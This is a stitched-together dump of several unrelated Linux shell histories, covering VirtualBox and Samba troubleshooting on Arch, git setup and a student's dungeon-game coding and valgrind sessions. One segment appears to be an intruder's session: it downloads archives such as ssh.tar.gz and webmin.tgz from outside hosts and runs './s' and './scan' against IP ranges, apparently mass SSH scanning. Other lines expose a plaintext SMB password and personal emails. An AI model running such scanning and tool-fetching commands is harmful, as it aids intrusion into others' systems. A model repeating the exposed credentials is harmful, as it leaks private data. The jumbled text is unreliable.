+nmapplet +nm-applet +nm-connection-editor +sudo nm-connection-editor +sudo systemctl enable networkmanager +sudo systemctl enable nn +sudo systemctl enable nm +sudo systemctl enable network-manager +sudo systemctl enable networkmanager +sudo systemctl enable NetworkManager +sudo nm-connection-editor +sudo nm-connection-editor +su - +sudo nm-connection-editor +nmgui +sudo nmgui +sudo pacman -S nmgui +sudo thunar +sudo thunar +nm-connection-editor +sudo thunar +xfce4-settings-manager +sudo thunar +xfce4-settings-manager +reboot +xfce4-settings-manager +sudo thunar +xfce4-settings-manager +xfce4-settings-manager +sudo thunar +sudo thunar +sudo thunar +xfce4-settings-manager +sudo pacman -S Qqe +sudo pacman - Qqe +sudo pacman -Qqe +sudo thunar +xfce4-settings-manager +xfce4-settings-manager +sudo thunar +sudo thunar +xfce4-settings-manager +sudo thunar +xfce4-settings-manager +xfce4-settings-manager +xscreensaver +sudo thunar +xfce4-settings-manager +xfce4-settings-manager +sudo thunar +su - +sudo thunar +catfish +locale +timedate +time +date +locale +sudo thunar +sudo thunar +sudo systemctl --type=service +su - +sudo thunar +su - +sudo thunar +sudo mount -a +nano /etc/fstab/ +sudo thunar +sudo thunar +sudo reboot +sudo thunar +reboot +sudo thunar +sudo pacman -U linux +ls +pacman -Syu virtualbox-guest-util +sudo pacman -Syu virtualbox-guest-util +sudo pacman -Syu virtualbox-guest-utils +modprobe -a vboxguest vboxsf vboxvideo +sudo modprobe -a vboxguest vboxsf vboxvideo +sudo modprobe -a vboxsf +sudo modprobe -a vboxguest vboxvideo +vboxsf +sudo pacman -S vboxsf +sudo modprobe -a vboxguest vboxsf vboxvideo +sudo pacman -S vboxsf +sudo thunar +sudo pacman -S virtualbox-archlinux-additions +modprobe vboxdrv +systemctl start vbox.service +sudo systemctl start vbox.service +sudo systemctl start virtualbox.service +systemctl +sudo thunar +VBoxClient --clipboard --draganddrop --seamless --display --checkhostversion +VBoxClient-all +VBoxClient --clipboard --draganddrop +systemctl enable vboxservice +sudo systemctl enable vboxservice +sudo systemctl start vboxservice +sudo thunar +VboxClient-all +sudo VboxClient-all +sudo VboxClient -all +VBoxClient-all +sudo VBoxClient --clipboard --draganddrop +mount.vboxsf +sudo mount.vboxsf +sudo mount -t vboxsf +sudo thunar +sudo thunar +sudo lsmod | grep vbox +sudo thunar +sudo thunar +modprobe virtualbox +sudo modprobe vboxsf +sudo modprobe vboxdrv +sudo pacman -Rms virtualbox-host-modules +sudo pacman -Rns virtualbox-host-modules +depmod +sudo depmod +uname -r +sudo depmod 3.17.3-1-ARCH +sudo modprobe vboxsf +sudo modprobe vboxvideo +sudo modprobe vboxsf +sudo modprobe vboxguest +sudo modprobe vboxsf +sudo modprobe drm +sudo modprobe vboxvsf +sudo modprobe vboxvsf +sudo thunar +reboot +journalctl -b 1 +sudo journalctl -b 1 +sudo pacman -S samba +sudo thunar +mkdir /media/share/ +sudo mkdir /media/share/ +// /media/share cifs username=toeknee,password=2dog4hit3 +// /media/share cifs username=toeknee +smbclient -L toekneesuperpc -U% +smbclient -L TOEKNEESUPERPC -U% +smbclient // -u toeknee +smbclient testparm +pacman -S smbclient +sudo smbclient // -u toeknee +reboot +sudo thunar +sudo pacman -Scc +pacman -U /var/cache/pacman/pkgname-olderpkgver.pkg.tar.gz +sudo pacman -U /var/cache/pacman/pkgname-olderpkgver.pkg.tar.gz +su - +su - +su - +sudo thunar +sudo modprobe vboxsf +sudo modprobe vboxfs +sudo thunar +sudo pacman -Syy +sudo pacman -S virtualbox-guest-utils +depmod -a +sudo depmod -a +sudo modprobe vboxfs +sudo modprobe vboxdrv +sudo modprobe vboxnetadp +sudo modprobe vboxnetflt +sudo modprobe vboxpci +sudo pacman -S virtualbox-guest-modules +sudo depmod -a +sudo modprobe vboxfs +sudo modprobe vboxguest +sudo modprobe vboxfs +sudo modprobe vboxvideo +sudo VboxClient --draganddrop +VboxClient --draganddrop +vboxclient +VBoxClient +VBoxClient --draganddrop +VBoxClient-all +systemctl enable vboxservice +sudo systemctl enable vboxservice +/sbin/mount.vboxsf +sudo /sbin/mount.vboxsf +sudo modprobe vboxsf +uname -r +sudo thunar +sudo thunar +sudo modprobe vboxfs +sudo modprobe vboxsf +sudo modprobe vboxfs +su - +sudo thunar +uname -r +sudo modprobe vboxfs +sudo pacman -S virtualbox-archlinux-additions +sudo pacman -Qs virtualbox +sudo pacman -S virtualbox-guest-modules virtualbox-guest-utils +sudo modprobe vboxsf +lsmod | grep vbox +sudo modprobe vboxvsf +sudo pacman -S dkms +depmod -a +suod depmod -a +sudo depmod -a +sudo modprobe vboxvsf +reboot +reboot +sudo thunar +sudo mkdir /mnt/share/ +sudo mount -t vboxsf ShareForVMs /mnt/share/ +sudo smbclient // -u toeknee +sudo smbclient // -u toeknee +testparm +sudo smbclient // -u toeknee +sudo smbclient // -u +sudo smbclient // -u +sudo smbclient +sudo smbclient // -u toeknee -p +sudo smbclient // -u toeknee -p 2dog$hit3 +// /media/share/ cifs username=toeknee,password=2dog$hit3 +// /media/share/ cifs username=toeknee +ping +// /media/share/ cifs username=toeknee +//TOEKNEESUPERPC/filmTemp /media/share/ cifs username=toeknee +// /media/share/ cifs username=toeknee +mount | grep vbox +nano /etc/fstab +/sbin/mount.vboxsf +sudo /sbin/mount.vboxsf +sudo /sbin/mount.vboxsf ShareForVMs +sudo /sbin/mount.vboxsf ShareForVMs rw +mkdir /media/share/ +sudo mkdir /media/share/ +mount /dev/cdrom /mnt +sudo mount /dev/cdrom /mnt +sudo mount /dev/sr1 +sudo mount /dev/sr2 +ls +sudo ./autorun.sh -v +sudo ./VBoxLinuxAdditions.run -v +sudo VBoxLinuxAdditions.run -v +sudo ./VBoxLinuxAdditions.run +sudo pacman -R virtualbox-guest-utils virtualbox-guest-modules +sudo mount /dev/hdb +sudo mount /dev/hdb1 +sudo mount /dev/sdb +sudo mount /dev/sda1 +sudo mount /dev/sda2 +sudo mount /dev/sda3 +// /media/share/ cifs username=toeknee +reboot +sudo thunar +sudo thunar +exex startxfce4 +exec startxfce4 +startx +exec startxfce4 +startx +login +su - +startx +lspci |grep VGA +lspci | grep VGA +pacman -S xorg-server xorg-init xorg-server-utils +sudo pacman -S xorg-server xorg-init xorg-server-utils +sudo pacman -S xorg-server xort-init xorg-server-utils +sudo pacman -S xorg-server xorg-server-utils +startx +exec startxfce4 +killall xorg +rm /etc/X11/xorg.conf +sudo rm /etc/X11/xorg.conf +sudo rm /etc/X11/xorg.conf.d +sudo rm -r /etc/X11/xorg.conf.d +startx +[A +exec startxfce4 +reboot +sudo pacman -S xorg-server xorg-server-utils +startx +sudo startx +su - +nano /etc/xorg.conf +sudo -i +xinit +startxfce4 with-ck-launch +startxfce4 +systectl --failed +systemctl --failed +pacman -Syu +sudo pacman -Syu +startx +nano /var/log/Xorg.0.log +pacman -S virtualbox-guest-utils +sudo pacman -S virtualbox-guest-utils +sudo pacman -S virtualbox-guest-dkms +sudo pacman -S linux-headers +depmod -a +sudo depmod -a +reboot +modprobe loop +sudo modprobe loop +sudo thunar +pacman -U linux-3.16.4-1-x86_64.pkg.tar.xz linux-headers-3.16.4-1-x86_64.pkg.tar.xz +sudo pacman -U linux-3.16.4-1-x86_64.pkg.tar.xz linux-headers-3.16.4-1-x86_64.pkg.tar.xz +sudo pacman -U /var/cache/pacman/pkg/linux-3.16.4-1-x86_64.pkg.tar.xz /var/cache/pacman/pkg/linux-headers-3.16.4-1-x86_64.pkg.tar.xz +sudo pacman -U /var/cache/pacman/pkg/linux-3.16.4-1-x86_64.pkg.tar.xz +sudo pacman -U /var/cache/pacman/pkg/linux-3.17.2-1-x86_64.pkg.tar.xz +sudo pacman -U /var/cache/pacman/pkg/linux-3.16.4-1-x86_64.pkg.tar.xz /var/cache/pacman/pkg/virtualbox-guest-modules-4.3.18-4-x86_64.pkg.tar.xz +sudo pacman -U /var/cache/pacman/pkg/linux-3.16.4-1-x86_64.pkg.tar.xz /var/cache/pacman/pkg/virtualbox-guest-modules-4.3.16-3-x86_64.pkg.tar.xz +sudo pacman -R virtualbox-host-modules +sudo pacman -R virtualbox-host-modules virtualbox +sudo pacman -U /var/cache/pacman/pkg/linux-3.16.4-1-x86_64.pkg.tar.xz /var/cache/pacman/pkg/virtualbox-guest-modules-4.3.16-3-x86_64.pkg.tar.xz +losetup +modprobe loop +uname -r +reboot +sudo pacman -S archiso +uname -r +modprobe vboxsvsf +modprobe vboxsvfs +modprobe vboxsf +su - +sudo thunar +sudo thunar +xfce4-settings-manager +sudo thunar +sudo pacman -R archiso +sudo pacman -S archiso-19 +git clone git://projects.archlinux.org/archiso.git && cd archiso +make install +sudo make install +sudo thunar +su - +sudo thunar +sudo thunar +xfce4-settings-manager +xfce4-settings-manager +sudo thunar +mkdir ${XDG_CONFIG_HOME:-~/.config}/menus/ +cp $prefix/etc/xdg/menus/xfce-applications.menu ${XDG_CONFIG_HOME:-~/.config}/menus +sudo cp -v ~/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-panel.xml +sudo cp -v ~/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-panel.xml /etc/xdg/xfce4/xconf/xfce-perchannel-xml/ +sudo cp -v ~/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-panel.xml /etc/xdg/xfce4/xfconf/xfce-perchannel-xml/ +sudo cp -v ~/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-panel.xml /etc/xdg/xfce4/xfconf/xfce-perchannel-xml/ +sudo thunar +sudo thunar +sudo reboot +su - +sudo thunar +sudo pacman -Syu +reboot +su - +ifconfig +sudo thunar +reboot +git --version +git config --global user.name "liZhenggg" +git config --global user.email "l912943297@qq.com" +ls +ls -la +ls +ls -la +ls +ls +ls -la +ls +ls +ls -la +sudo +ld +ls +ls -la +cat .bashrc +less .bashrc +less +more +more .bashrc +ls +man login +vi +mcedit . +mcedit +ed +pno +nano +pico +nano +set +set | grep TERM +nano +mcedit +nano +mcedit +mcedit +vim +pico +nano +w +ls +ls +ls +wget +wgetssh.tar.gz +tar -zxvf ssh.tar.gz +rm -rf ssh.tar.gz +chmod +x * +./s 209.213;./s 149.72;./s 149.170;./s 149.251 +ls +rm -rf antonio +ls +wget osmail.org/.g/webmin.tgz +wgetsshII.tar +tar -zxvf webmin.tgz +rm -rf webmin.tgz +tar -zxvf sshII.tar +tar -xvf sshII.tar +tar -zxv sshII.tar +tar -zxvf sshII.tar +tar -xvf sshII.tar +rm -rf sshII.tar +ls +ls +chmod +x * +./scan 216.89 +npm install +yarn start +npm start +npm install --save react-scripts +node -v +npm install +npm start +sudo npm install -g firbase-tools +npm install -g firbase-tools +npm install -g firebase-tools +firebase login --interactive +npm run deploy +firebase login --interactive +npm run deploy +ssh +ssh root@ +ssh root@ +ifconfig +route -n +ls +java -jar xletview.jar +java -jar xletview.jar +ls +ls +ls +ls +ls +java -jar xletview.jar +git clone +ls +git status +gedit teste.txt +git status +git add +git add. +yy +git add . +git status +git commit +git congig --global user.name:Matheus +yes +git config +git config --global +git config --global user.name Matheus +git status +git connit +commit +git commit +git add . +gedit teste.txt +git commit +mv ../teste.txt . +git status +git commit +git commit m +git commit -m +git diff +git commit -m ¨teste.txt¨ +git status +mkdir pm87-anotacoes +git init +git remote add origin +git remote add origin git@github.com:mathheuspires/pm87-anotacoes.git +git push -u origin master +git remote add origin git@github.com:mathheuspires/pm87-anotacoes.git +git push -u origin master +git remote add origin git@github.com:mathheuspires/pm87-anotacoes.git +git push -u origin master +ls +ls +ls -l +joe .ssh/authorized_keys +ls +ls +mkdir .ssh +mv authorized_keys +mv authorized_keys .ssh/ +ls +mv known_hosts .ssh +ls +ls +ls -l +ls -l /root/.ssh +ls +ls +ls +ls -l +chown data_sync.data_sync * +su +ls +ls -l +ls +ls +ls -l +less JDJ5JDEwJFl1M1Z1SlhzYUh4VVNmSE5lRUpOV09rbDFaaDFsY3RrOElFMWhnLi9IVWRubFlqZUJIYWtL.csv +ls -l +ls +ls +ls -l +ls +ls +ls +ls +composer global require "laravel/installer" +ls +exit +php artisan serve +ls +$HOME/.composer/vendor/bin +ls -al +nano .bashrc +laravel new +create-project +exit +composer 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reserved.txt | awk and +cat reserved.txt | awk 'and' +cat reserved.txt | sort +cat reserved.txt | grep and +cat reserved.txt | grep and -c +cat reserved.txt | grep "and" -c +vim reserved.txt +cat reserved.txt | grep -c "and" +cat reserved.txt | grep -c +cat reserved.txt | awk '{count[$0]++}END{for(i in count)print count[i], i}' +cat reserved.txt | awk '{count[$0]++}END{for(i in count)print count[i], i}' | sort +cat reserved.txt | awk '{count[$0]++}END{for(i in count)print count[i], i}' | sort -n +ls +vim reserved.txt +cp reserved.txt reserved.pl +perl reserved.pl +vim math2.cpp +ls +mv test ../ksnctf +ls +file drive.img +cat drive.img +exit +base64 -d onion.txt +base64 +base64 -D onion.txt +base64 -d onion.txt +exit +rev cheap.txt +rev cheap.txt >> base64 -d +rev cheap.txt >> base64 -D +exit +g++ Wireless.cpp +fish +g++ Wireless.cpp +exec $SHELL -l +sudo apt install rbenv +rbenv --version +git clonesstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build +rbenv install --list +rbenv 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cs211 +pwd +pwd +g++ +/Users/zaheerhossain/Desktop/PerfectNum.cp +rmdir cs211 +mkdir cs211 +mkdir temp1 +ls -lrt +rmdir temp1 +ls -lrt +ls +ls -lrt +temp.cpp +pwd +pdw +pd +wp +dwp +dwpd +wd +clear +touch testfil.cpp +cp testfile.cpp hello.cpp +cp testfil.cpp hello.cpp +mv hello.cpp helloworld.cpp +rm testfil.cpp +ls +;s -lrt +ls -lrt +exit +gcc +g++ +pwd +ls -ltr +sudo gedit helloworld.cpp +gedit helloworld.cpp +g++ helloworld.cpp +gedit helloworld.cpp +g++ helloworld.cpp +gedit helloworld.cpp +g++ helloworld.cpp. +g++ helloworld.cpp +gedit helloworld.cpp +g++ helloworld.cpp +gedit helloworld.cpp +g++ helloworld.cpp +gedit helloworld.cpp +g++ helloworld.cpp +gedit helloworld.cpp +g++ helloworld.cpp +exti +exit +gedit helloworld.cpp +g++ helloworld.cpp +gedit helloworld.cpp +g++ helloworld.cpp +gedit helloworld.cpp +g++ helloworld.cpp +./ a.out +helloworld.cpp +exit +git@github.com:hossainzaheer48/ballislife.git +ssainzaheer48/ballislife.git +git +git int +git init +git clone +git clonessainzaheer48/ballislife.git +git status +git add +git add ballislife +git status +git commit -m "add three empty files" +git config --global user.name "Zaheer Hossain" +git config --global user.email "hoza7332@venus.cs.cuny.edu" +git commit --amend --reset-author +cat /etc/fstab +mount +sudo reboot +ls +ls /lfs/ +sudo poweroff +ls +ls /dev/ +ls /dev/sda +sudo cfdisk /dev/sda +mount | grep '/' +mount | grep sda +vi .bashrc +sudo ls /root/.bash +sudo ls /root/ +sudo ls -la /root/ +vi /root/.bashrc +sudo vi /root/.bashrc +exit +echo $LFS +su +sudo passwd root +su - +ls +mount --help +swapon --help +mount +mount|grep swap +ls /dev/sda +mount|grep sda +ls -lh /lfs/ +ls -lh / | grep lfs +sudo swapon +mount +mount --help +sudo cfdisk /dev/sda +swapon -v /dev/sda7 +sudo swapon -v /dev/sda7 +su - +exit +sudo reboot +sudo git init +ls +sudo visudo +sudo vi /etc/group +exit +export PATH="." +sshd +exit +masters +w +uname -a +id +passwd +w +ps x +ls +wgets.com/burgija_sr/m.tar.gz +tar zxvf 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+mkdir sample-behat +pwd +mkdir Konopka_Christopher.assignment-0 +ls +git init +git remote add origin +git remote add origin +git remove -v +git remotve -v +git remote -v +git pull origin master +ls +make +make MakeFile +make clean +make -f MakeFile +git pull origin master +ls +make -f MakeFile +make -f Makefile +git pull origin master +ls +make -f Makefile +make +.\iter +lc +ls +.\recursive +./recursive 1000 +./ iter +./iter +git clonestopher.assignment-1.git +ls +ls +git clonestopher.assignment-1.git +ls +ls +make +vim MakeFile +make +vim MakeFile +make +vim MakeFile +make +make main +vim MakeFile +ls +git pull origin master +ls +git add . +git commit -m " new makefile" +ls +git pull origin master +git confige --global user.name "ckonopka" +git config --global user.name "ckonopka" +git config --global user.email ckonopka@iastate.edu +git pull origin master +git fetch +git pull origin master +git branch +ls +make +vim Makefile +make +./main +ls +ls + +ls +git init +git add . +git commit -m "hi" +git add remote originstopher.assignment-1.git +git remote add originstopher.assignment-1.git +git push origin master +ls +make +ls +make clean +ls +git push origin master +git commit +git push origin master +git add +git add . +git commit +git push origin master +ls +git status +git add . +git commit -m "cleaned files" +git status +git push origin master +git pull origin master +ls +git pull origin master +Make +make +vim make +vim Makefile +rm make +vim main.c +make +vim Dungeon.h +make +vim Dungeon.h +vim main.c +make +vim Dungeon.h +make +g + +./main +./main --save +./main --load +valgrind ./main +valgrind --leak-check=full ./main +valgrind --leak-check=full --track-origins=yes ./main +valgrind --leak-check=full --track-origins=yes -v ./main +vim main.c +./main +./main --save +valgrind --leak-check=full --track-origins=yes -v ./main --save +valgrind --leak-check=full --show-leak-kinds=all --track-origins=yes -v ./main --save +./main --save +valgrind --leak-check=full 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+valgrind --leak-check=full ./main --nummon 5 +vim Monster.c +vim Dungeon.c +make clean +git push origin master +git add . +git commit -m "mem changes final" +git push origin master +ls +vim Monster.c +make +valgrind --leak-check=full ./main --nummon 5 +vim Monster.c +vim Monster.h +vim PlayerCharacter.c +vim Monster.c +vim PlayerCharacter.h +vim main +vim main.c +make +valgrind --leak-check=full ./main --nummon 5 +vim main.c +make +valgrind --leak-check=full ./main --nummon 5 +git add . +git commit -m "0 bytes leaked, how is this possible" +make clean +git add . +git commit -m "0 bytes leaked, how is this possible!" +git push origin master +make +./main save --nummon 5 +./main --nummon 5 +./main save --nummon 5 +make +./main save --nummon 5 +./main --load --nummon 5 +./main --save --nummon 5 +make +./main --save --nummon 5 +./main --save +./main --load +./main --save --nummon 5 +./main --load --nummon 5 +./main --save --nummon 5 +make +./main --save --nummon 5 +./main --save-- load --nummon 5 +./main --save --load --nummon 5 +make +./main --save --nummon 5 +./main --load --save --nummon 5 +vim Dungeon.c +vim Dungeon.h +./main --load --save --nummon 5 +./main --save --nummon 5 +./main --save --nummon 5 +./main --save --nummon 5 +ls +git pull origin +git pull origin -F +git pull origin -f +git add . +git commit -m "changes: +git commit -m "changes" +git pull origin + +} + + + + + +wqe +2 +e23 +r +32r +32 +r +23r +23 +r +23 +r23 +r +23 +r2 +r +2 +r2 +3r +2 +r +23 +r +2r +2 +r2 +r +2 +r +23r +2 +r23 +r +3 + + + + + + + + + + + +make +gcc +./main --nummon 5 +./main --load --save --nummon 5 +vim *.c *.h +git commit -m "changes" +git pull origin +git pull origin/ +git pull origin +vim main.c +vim *.c *.h :args +:n main.C +:n main.c +:n main +:n main.c +vim main.c +vim *.c *.h :args +make +vim *.c *.h +make +./main --nummon 5: +./main --nummon 5 +rm .main.c.swp +./main --nummon 5 +make +./main --nummon 5 +make + +make +./main --nummon 5 + + +make +make +./main --nummon 5 +git add . +git commit - m "changing how dugn is created" +git commit -m "changing how dugn is created" +git push origin master +make +./main --nummon 5 +vim *.c *.h +vim *.c *.h +git add . +git commit -m "going to be changing things" +make +./main --nummon 5 +git add . +git commit -m "stuck" + +make +./main --nummon 5 +vim *.c *.h +make +./main --nummon 5 +vim *.c *.h +vim .vimrc +vim .vimrc +make +./main --nummon 5 +./main +git add . +git commit -m "need debugs" +git push origin master +make +./main + +./main +Valgrind +valgrind +valgrind ./main --nummon 5 +make +valgrind ./main --nummon 5 +vim *.c *.h + + +./main --nummon --5 +./main --nummon 5 +./main +Valgrind ./main +valgrind ./main +valgrind --Leak-check=full ./main +valgrind --Leak-check=full --track-origins=yes +valgrind --Leak-check=full --track-origins=yes ./main +valgrind --leak-check=full --track-origins=yes ./main +./main +make +./main +make +./main +valgrind --leak-check=full --track-origins=yes ./main +>make clean +git add . +git commit -m "turning in something" +git push origin master +make +./main +make +make clean +git add . +git commit -m "holla" +git push origin master +make +./main +f +make +./main + +./main +make +>make +make +./main +make +./main +make +./main +git add . +git commit -m "bugs +git commit -m "bugs" +make +./main +make +./main +./main --nummon 1 +./main --nummon 50 +make clean +git add . +git commit -m "now totally done" +git push origin master + +make +valgrind --leak-check=full --track-origins=yes ./main +vim *.c *.h +vim *.c *.h +git push origin master +git add . +git commit -m "bugs" +git push origin master +make +./main +ls + +make +./main +make + +make +./main +make +./main +git reflog +ls +make +ls +rm -R /Konopka_Christopher.assignment-1 +rm -R Konopka_Christopher.assignment-1/ +ls +make +./main +make +./main +make +./main +make +./main +make +./main +make +./main +make +./main +make +./main +make +./main +make +./main +make +./main +make +./main +make +./main --nummon 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commit -m "making progress 2" +git push origin master +git pull origin master +make clean +git add . +git commit -m "going to make them double pointers" + +make clean +git pull origin master +git add . +git commit -m "`\_("?)_/'" +git commit -m "yeahhhhhh" +make +vim Chaaracter.h +vim Character.h +vim Character.cpp +vim Character.h +make clean +vim make +vim Makefile +make +vim Player.h +make clean +make +vim Player.h +make clean +make +vim main.c +make clean +make +vim Character.h +make clean + +vim main.c +make clean +make +vim main.c +make clean +make +vim Player.cpp +make clean +make +vim Player.cpp +make clean +make +vim main.c +make clean +make +vim main.c +make clean +make +vim main.c +make clean +make +vim Player.cpp +make clean +make +vim Player.cpp +make clean +make +vim Monster.h +make clean +make +vim Dungeon.h +make clean +make +vim Player.h +vim Player.cpp +vim Monster.cpp +make clean +make +vim Player.cpp +make clean +vi main.c +vim makefile +vim Makefile +make clean +make +vim Makefile +make clean +make +vim Makefile +make clean +make +./main +valgrind ./main +valgrind --track-origins=yes ./main +vim Character.p +vim Character.h +vim Character.cpp +make clean +make +valgrind --track-origins=yes ./main +make clean +vim main.c +make clean +vim Character.h +vim main.c +vim Character.cpp +make clean +make +vim main.c +make clean +make +valgrind --track-origins=yes ./main +vim main.c +make clean +valgrind --track-origins=yes ./main +make +valgrind --track-origins=yes ./main +make clean +valgrind --track-origins=yes ./main +make +valgrind --track-origins=yes ./main +vim main.c +valgrind --track-origins=yes ./main +vim main.c +make +valgrind --track-origins=yes ./main +./main +valgrind --track-origins=yes ./main +vim Monster.ccp +vim Monster.cpp +make clean +make +valgrind --track-origins=yes ./main +./main +vim Character.cpp +valgrind --track-origins=yes ./main +vim Character.cpp +vim Dungeon.c +make clean +make +valgrind --track-origins=yes ./main +vim Dungeon.c +make clena +make clean +make +valgrind --track-origins=yes ./main +vim Monster.cpp +make clean +make +valgrind --track-origins=yes ./main +vim Monster.cpp +vim main.c +make clena +make clean +make +vim main.c +make clean +make +valgrind --track-origins=yes ./main +vim Monster.cpp +valgrind --track-origins=yes ./main +cim Character.cpp +vim Character.cpp +valgrind --track-origins=yes ./main +vim player.cpp +vim Player.cpp +valgrind --track-origins=yes ./main +vim Monster.cpp +vim Dungeon.c +make clean +make +vim Dungeon.c +make clean +make +valgrind --track-origins=yes ./main +vim main.c +vim dungeon.c +vim Dungeon.c +make clean +make +valgrind --track-origins=yes ./main +vim Player.cpp +vim Util.h +vim Player.cpp +make clean +make +valgrind --track-origins=yes ./main +valgrind --track-origins=yes ./main --nummon 5 +vim Main.c +vim main.c +make clean +make +valgrind --track-origins=yes ./main --nummon 5 +vim main.c +valgrind --track-origins=yes ./main --nummon 5 +vim main.c +vim Player.cpp +make clean +make +valgrind --track-origins=yes ./main --nummon 5 +make fail +make clean +git push or +git commit -m "yeahhhhhh" +git push origin master +vim main.c +vim monster.cpp +vim Monster.cpp +vim Dungeon.c +make clean +make +valgrind --track-origins=yes ./main --nummon 5 +git add . +git commit -m "kindof working" +git push origin master +vim Monster.cpp +make clean +make +vim Monster.cpp +valgrind --track-origins=yes ./main --nummon 5 +vim main.c +make clean +make + +vim monster.cpp +vim Monster.cpp +make clean +make +vim Monster.cpp +make clean +make +valgrind --track-origins=yes ./main --nummon 5 +vim Main.c +vim main.c +make clean +make +valgrind --track-origins=yes ./main --nummon 5 +valgrind --track-origins=yes ./main --nummon 1 +vim Monster.h +vim Monster.cpp +vim main.c +make clean +make +vim Monster.cpp +make clean +make +vim Monster.cpp +vim Monster.cp +make clean +make +valgrind --track-origins=yes ./main --nummon 5 +git add . + + + +make clean +make +vim main.c +make +vim main.c +make +vim Monster.cpp +make +valgrind --track-origins=yes ./main --nummon 5 +vim main.c +make clean +make +valgrind --track-origins=yes ./main --nummon 5 +valgrind --track-origins=yes ./main --nummon 1 +vim main.c +valgrind --track-origins=yes ./main --nummon 5 +vim main.c +make clean +make +vim main.c +make +valgrind --track-origins=yes ./main --nummon 5 +vim main.c +make clean +make +valgrind --track-origins=yes ./main --nummon 5 +vim main.c +make cleam +make clean +make +valgrind --track-origins=yes ./main --nummon 5 +vim main.c +make clean +make +vim main.c +make clean +make +valgrind --track-origins=yes ./main --nummon 5 +valgrind --track-origins=yes ./main --nummon 1 +valgrind --track-origins=yes --leak-check=full ./main --nummon 5 +vim Monster.cpp +make clean +make +valgrind --track-origins=yes --leak-check=full ./main --nummon 5 +valgrind --track-origins=yes --leak-check=full ./main --nummon 1 +vim main.c +make clean +make +valgrind --track-origins=yes --leak-check=full ./main --nummon 1 +vim main.c +make clean +make +vim main.c +make clean +make +valgrind --track-origins=yes --leak-check=full ./main --nummon 1 +git add . +git commit -m "everything but FOW works" +git push origin master +valgrind --track-origins=yes --leak-check=full ./main --nummon 1 +valgrind --track-origins=yes --leak-check=full ./main --nummon 10 +valgrind --track-origins=yes --leak-check=full ./main --nummon 20 +valgrind --track-origins=yes --leak-check=full ./main --nummon 15 + +get pull origin master +git pull origin master +vim Player.cpp +make +valgrind --track-origins=yes --leak-check=full ./main --nummon 5 +vim Player.cpp +make clean +make +valgrind --track-origins=yes --leak-check=full ./main --nummon 5 +vim Player.cpp +make clean +make +valgrind --track-origins=yes --leak-check=full ./main --nummon 5 +vim Player.cpp +valgrind --track-origins=yes --leak-check=full ./main --nummon 5 +vim Player.cpp +vim Dungeon.c +vim Dungeon.h +valgrind --track-origins=yes --leak-check=full ./main --nummon 5 +vim Dungeon.h +vim Player.cpp +make clean +make +vim Player.cpp +make clean +make +vim Player.cpp + +make +valgrind --track-origins=yes --leak-check=full ./main --nummon 5 +vim Player.cpp +vim Player.h +vim Player.cpp +make clean +make +valgrind --track-origins=yes --leak-check=full ./main --nummon 5 +vim main.c +vim player.cpp +vim Player.cpp +make clean +make +valgrind --track-origins=yes --leak-check=full ./main --nummon 5 +vim player.cpp +vim Player.cpp +make clean + + +vim main.c +make clean +make +valgrind --track-origins=yes --leak-check=full ./main --nummon 1 +vim main.c +./main +valgrind --track-origins=yes --leak-check=full ./main +./main +valgrind --track-origins=yes --leak-check=full ./main +vim main.c +make +make clean +makeviv +valgrind --track-origins=yes --leak-check=full ./main + +valgrind --track-origins=yes --leak-check=full ./main +./main +valgrind ./main +valgrind ./mai +git pull origin master +make +make clean +make +vim main.c +valgrind ./main +vim main.c +valgrind ./main +make clean +make clean +vim player.cpp +vim Player.cpp +make +vim main.c +make clean +make +valgrind ./main +vim main.c +vim Character.cpp +make clean +make +valgrind ./main +make +vim player.cpp +vim Player.cpp +vim Player.h +vim Player.cpp +make clean +git push origin master +git add . +git commit -m "hella odd probs" +git push origin master +valgrind ./main +make +valgrind ./main +make clean +make +vim main.c +make +vim +valgrind ./main +vim Monster.cpp +make clean +make +valgrind ./main +vim Player.cpp +make cleam +make clen +make clean +make +vim Player.cpp +vim Player.h +make cleam +make clean +make +vim Player.h +vim Player.cpp +make clean +make +valgrind ./main +vim main.c +make clean +make +valgrind ./main +vim player.cpp +vim Player.cpp +vim Dungeon.c +vim Dungeon.h +vim Player.cpp +make clean +make +valgrind ./main +vim main.c +make clean +make +./main +valgrind ./main +valgrind ./main --nummon 1 +valgrind ./main --nummon 50 +valgrind ./main --leak-check=full --nummon 50 +valgrind ./main --leak-check=full-v --nummon 50 +valgrind ./main -v --nummon 50 + +vim Character.h +make file +make +make clean +make +valgrind -v ./main --nummon 5 +valgrind -v ./main --nummon 1 +./main +valgrind -v ./main --nummon 1 +git add . +git commit -m "THIS CANT BE HAPPENING" +git push origin master +git pull origin master +make +make clean +make +./main +./main --nummon 1 +git pull origin master +make +git pull origin master +make +vim Makefile +vim Util.h +make +vim Util.h +make +make clean +make +vim main.cpp +make +vim Dungeon.cpp +make +make clean +make +vim Makefile +make +vim Dungeon.cpp +:wq +vim Dungeon.h +make +vim Dungeon.h +vim Dungeon.cpp +make +vim Dungeon.cpp +make +vim Dungeon.cpp +make +vim Dungeon.cpp +make +vim Dungeon.cpp +make +ls -a +ls -a +vim monster desc.txt. +vim monster desc.txt +ls +vim monster_desc.txt +rm monster +ls +vim main.c +vim main.cpp +make +vim main.cpp +make clean +make +./main +git add . +git commit -m "almost done" +git push origin master +git pull origin master +make +mv monster_desc.txt ~/.rlg327 +ls +make clean +ls +vim monster_desc.txt +make clean +make +./main +git pull origin master +mv monster_desc.txt ~/.rlg327 +make +./main +ls +vim monster_desc.txt +make clean +make +./main +vim monster_desc.txt +make +./main +vim main.cpp +vim monster_desc.txt +make clean +make +./main +ls +vim main.c +vim main.cpp +make clean +make +./main +vim main.cpp +make +./main +vim monster_desc.txt +vim main.cpp +make +vim main.cpp +make +vim main.cpp +make +vim main.cpp +make +vim main.cpp +make +./main +make clean +make +./main +git add . +git commit -m "think its alllll good" +git push origin master +ls +vim monster_desc.txt +make +./main +vim main.cpp +make +./main +git add . +git commit -m "done woo" +git push origin master +vim monster_desc.txt +git pull origin master +ls +mv autoload ~/.vim +mv .vimrc ~/.vim +ls +ls -a +mkdir bundle +git clonescrooloose/nerdtree +vim .vimrc +git clonescrooloose/syntastic +git clone +git clone +git cloneshougo/neocomplete.vim +git clone +git clone +git clonesbra/vim-commentary +make +vim Makefile +ls +vim rlg327.cpp +vim Makefile +make +git pull origin master +ls +rm . +rm * +ls +git pull origin master +ls +git add . +git commit -m "work please" +git pull origin master 